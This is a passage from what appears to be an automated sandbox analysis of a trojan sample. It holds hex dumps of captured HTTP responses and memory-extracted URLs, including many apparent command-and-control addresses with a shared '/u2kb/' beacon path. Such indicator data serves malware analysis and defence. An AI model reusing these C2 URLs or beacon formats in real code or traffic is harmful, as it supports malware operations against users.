70 61 6e 3e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 61 20 63 75 73 74 6f 6d 65 72 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 42 65 63 6f 6d 65 20 61 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 63 75 73 74 6f 6d 65 72 20 61 6e 64 20 62 65 6e 65 66 69 74 20 66 72 6f 6d 20 74 68 65 20 6e 75 6d 65 72 6f 75 73 20 61 64 76 61 6e 74 61 67 65 73 21 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 16:00:34 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:39 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:42 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.0.28expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://thedivinerudraksha.com/wp-json/>; rel="https://api.w.org/"content-length: 11417content-encoding: gzipvary: Accept-Encodingdate: Mon, 20 Mar 2023 16:00:49 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 73 e3 36 b2 ef df 33 55 f9 0e 58 e6 cc da da 88 14 a9 87 1f b2 ad 3d 99 64 b6 4e ce 49 36 53 99 c9 d9 da 9b 4d a9 20 12 92 38 26 09 2e 49 49 76 1c ef f7 b9 5f e3 7e b2 5b 0d 80 24 48 82 0f d9 f2 ec 64 d7 9e 1a 5b 02 1a 8d 46 a3 f1 03 d0 78 5d fe ee eb ef bf 7a ff d7 b7 6f d0 7f bd ff ee db d9 67 2f 2f d7 89 ef 21 0f 07 ab 2b 8d 04 fa 8f ef 34 16 48 b0 33 fb ec e5 8b 4b 9f 24 18 d9 6b 1c c5 24 b9 d2 7e 7c ff 27 fd 4c 63 11 89 9b 78 64 f6 16 af 08 0a 68 82 96 74 13 38 e8 f7 9f 9f 0d 2d eb 02 bd 5f 13 f4 b5 bb 75 03 82 7e d8 38 11 be 8e d7 f8 72 c0 93 bc e4 3c 03 ec 93 ab a3 88 2e 68 12 1f 21 9b 06 09 09 92 ab 23 1f df e8 ae 8f 57 44 0f 23 b2 75 c9 6e ea e1 68 45 8e d0 60 f6 f2 d2 73 83 6b 14 11 ef ea c8 09 62 20 58 92 c4 5e 1f a1 75 44 96 57 47 83 41 b2 26 0e cb 35 4a 33 35 6c ea 77 4b bb a4 41 12 1b 2b 4a 57 1e c1 a1 1b 2b 52 6a d8 4b 48 14 e0 84 68 28 b9 0d c9 95 86 c3 d0 73 6d 9c b8 34 18 44 71 fc c5 8d ef 69 88 15 f3 4a 53 e9 00 fd 3e c2 7f df d0 0b f4 27 42 1c 8d e7 ad ad 93 24 8c a7 75 d2 0f 96 84 38 03 ed c9 24 f9 8a fa 3e 09 92 78 1f 91 6c 91 46 96 2d af 54 0d aa 2d a4 51 a2 65 d5 aa ed 5c 27 59 5f 39 64 eb da 44 67 5f fa c8 0d dc c4 c5 9e 1e db d8 23 57 96 56 64 f2 ee 7f fe fa f6 cd fc fd f7 df 7f fb fa cb 1f 24 4e 85 f0 f9 db 2f 7f 78 f7 e6 87 f9 57 df 7f f7 f6 cb f7 df bc fe f6 4d 89 4b b2 26 3e d1 6d ea d1 48 e2 f1 f9 92 8c 4f c6 79 8e 61 44 43 12 25 b7 57 1a 5d 4d 99 d2 24 e2 3d 4c 5c cd 70 13 79 12 3b 50 6d bd 66 37 c3 eb c5 40 cd c6 a3 a0 27 89 13 09 e6 d0 5a 55 b4 b1 9b 90 39 68 40 22 ef 2e 30 58 94 5c 77 64 01 fc 80 36 4e 6e 3d 82 5c e7 ea 68 47 29 b3 82 c8 26 ba 1b 78 6e 90 fd b1 e3 f8 68 f6 d2 90 08 d0 92 46 3e 32 e0 b7 1e d1 1d 32 22 f2 f7 8d 1b 11 07 dd a1 ad 1b bb 0b d7 73 93 db 29 ff ec 91 0b 74 ff f2 72 c0 b2 2a b4 5b 16 12 af 09 49 8e 98 08 9b 58 67 8d 96 e5 28 da 71 6a b8 aa d6 3c b0 e3 f8 8f 4b ec bb de ed d5 1b ef 8b ef 48 1c bb 91 fb 6a f4 e5 d8 34 5f 9d 7e f5 63 b4 c0 81 1b 27 22 60 f8 d5 84 fd 3e 31 cd df 7f 6e 8e ce 2e 1c 37 0e 3d 7c 7b 15 ef 70 c8 43 b6 24 ba 3a 31 2c c3 3a 42 3e 71 5c 7c 75 84 3d af 8c 36 0a a9 59 50 59 ea 7a 9b d8 85 ba a8 8b 01 33 e7 78 f0 8d 1f 46 e4 17 0c 05 e2 7a 32 7c 37 30 a0 78 20 d2 99 61 8d f7 94 48 ae cd 43 c8 45 7d 9f 06 4c bc Data Ascii: }{s63UX=dNI6SM 8&.IIv_~[$Hd[Fx]zog//!+4H3K$k$~|'Lcxdht8-_
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:01:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:42:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:01:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:42:34 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
          Source: cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Open
          Source: explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
          Source: explorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://justinmezzell.com
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.580448726.00000000158A6000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004A96000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7l
          Source: explorer.exe, 00000004.00000002.580448726.0000000014C16000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000003E06000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.222ambking.org
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.222ambking.org/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.222ambking.org/u2kb/www.222ambking.org
          Source: explorer.exe, 00000004.00000000.327263504.0000000008260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avisrezervee.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avisrezervee.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avisrezervee.com/u2kb/www.avisrezervee.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bitservicesltd.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bitservicesltd.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com
          Source: explorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.dzyngiri.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecomofietsen.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecomofietsen.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.employerseervices.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.employerseervices.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.employerseervices.com/u2kb/www.employerseervices.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyservicestation.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyservicestation.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyservicestation.com/u2kb/www.energyservicestation.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com/u2kb/
